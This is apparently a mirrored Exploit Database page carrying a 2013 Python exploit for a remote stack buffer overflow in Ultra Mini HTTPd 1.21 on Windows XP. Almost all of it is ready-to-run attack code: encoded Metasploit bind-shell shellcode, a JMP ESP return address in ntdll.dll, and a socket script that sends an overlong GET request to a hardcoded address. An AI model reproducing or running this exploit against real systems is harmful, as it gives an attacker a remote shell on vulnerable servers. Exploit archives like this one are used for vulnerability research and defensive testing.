Ultra Mini HTTPd 1.21 – Remote Stack Buffer Overflow

• Exploit Database
• 12 阅读

• 作者： superkojiman
  日期： 2013-07-11
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/26739/

• # Exploit Title: Ultra Mini HTTPD stack buffer overflow
  # Date: 10 July 2013
  # Exploit Author: superkojiman - http://www.techorganic.com
  # Vendor Homepage: http://www.picolix.jp/
  # Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html
  # Version: 1.21
  # Tested on: Windows XP Professional SP2, English
  #
  # Description: 
  # A buffer overflow is triggered when requesting a very long 
  # resource name. 
  #
  
  import socket
  import struct
  
  # msfpayload windows/shell_bind_tcp R | \
  # msfencode -b "\x00\x0a\x0d\x20\x0b\x09\x0c"
  # [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
  
  shellcode = ( 
  "\xba\x1f\xb5\xae\xa1\xdd\xc4\xd9\x74\x24\xf4\x5e\x33\xc9" +
  "\xb1\x56\x31\x56\x13\x83\xc6\x04\x03\x56\x10\x57\x5b\x5d" +
  "\xc6\x1e\xa4\x9e\x16\x41\x2c\x7b\x27\x53\x4a\x0f\x15\x63" +
  "\x18\x5d\x95\x08\x4c\x76\x2e\x7c\x59\x79\x87\xcb\xbf\xb4" +
  "\x18\xfa\x7f\x1a\xda\x9c\x03\x61\x0e\x7f\x3d\xaa\x43\x7e" +
  "\x7a\xd7\xab\xd2\xd3\x93\x19\xc3\x50\xe1\xa1\xe2\xb6\x6d" +
  "\x99\x9c\xb3\xb2\x6d\x17\xbd\xe2\xdd\x2c\xf5\x1a\x56\x6a" +
  "\x26\x1a\xbb\x68\x1a\x55\xb0\x5b\xe8\x64\x10\x92\x11\x57" +
  "\x5c\x79\x2c\x57\x51\x83\x68\x50\x89\xf6\x82\xa2\x34\x01" +
  "\x51\xd8\xe2\x84\x44\x7a\x61\x3e\xad\x7a\xa6\xd9\x26\x70" +
  "\x03\xad\x61\x95\x92\x62\x1a\xa1\x1f\x85\xcd\x23\x5b\xa2" +
  "\xc9\x68\x38\xcb\x48\xd5\xef\xf4\x8b\xb1\x50\x51\xc7\x50" +
  "\x85\xe3\x8a\x3c\x6a\xde\x34\xbd\xe4\x69\x46\x8f\xab\xc1" +
  "\xc0\xa3\x24\xcc\x17\xc3\x1f\xa8\x88\x3a\x9f\xc9\x81\xf8" +
  "\xcb\x99\xb9\x29\x73\x72\x3a\xd5\xa6\xd5\x6a\x79\x18\x96" +
  "\xda\x39\xc8\x7e\x31\xb6\x37\x9e\x3a\x1c\x4e\x98\xf4\x44" +
  "\x03\x4f\xf5\x7a\xb2\xd3\x70\x9c\xde\xfb\xd4\x36\x76\x3e" +
  "\x03\x8f\xe1\x41\x61\xa3\xba\xd5\x3d\xad\x7c\xd9\xbd\xfb" +
  "\x2f\x76\x15\x6c\xbb\x94\xa2\x8d\xbc\xb0\x82\xc4\x85\x53" +
  "\x58\xb9\x44\xc5\x5d\x90\x3e\x66\xcf\x7f\xbe\xe1\xec\xd7" +
  "\xe9\xa6\xc3\x21\x7f\x5b\x7d\x98\x9d\xa6\x1b\xe3\x25\x7d" +
  "\xd8\xea\xa4\xf0\x64\xc9\xb6\xcc\x65\x55\xe2\x80\x33\x03" +
  "\x5c\x67\xea\xe5\x36\x31\x41\xac\xde\xc4\xa9\x6f\x98\xc8" +
  "\xe7\x19\x44\x78\x5e\x5c\x7b\xb5\x36\x68\x04\xab\xa6\x97" +
  "\xdf\x6f\xd6\xdd\x7d\xd9\x7f\xb8\x14\x5b\xe2\x3b\xc3\x98" +
  "\x1b\xb8\xe1\x60\xd8\xa0\x80\x65\xa4\x66\x79\x14\xb5\x02" +
  "\x7d\x8b\xb6\x06"
  )
  
  # 7C941EED, JMP ESP , ntdll.dll
  payload ="A" * 5392 + struct.pack("<I", 0x7C941EED)
  payload += "\x81\xc4\xf0\xea\xff\xff" + shellcode + "B" * 4230
  
  print "[+] sending payload, length", len(payload)
  
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect(("192.168.37.175", 80))
  
  buf = (
  	"GET /" + payload + " HTTP/1.1\r\n" + 
  	"Host: 192.168.37.175" + 
  	"\r\n\r\n"
  )
  
  s.send(buf)
  s.close()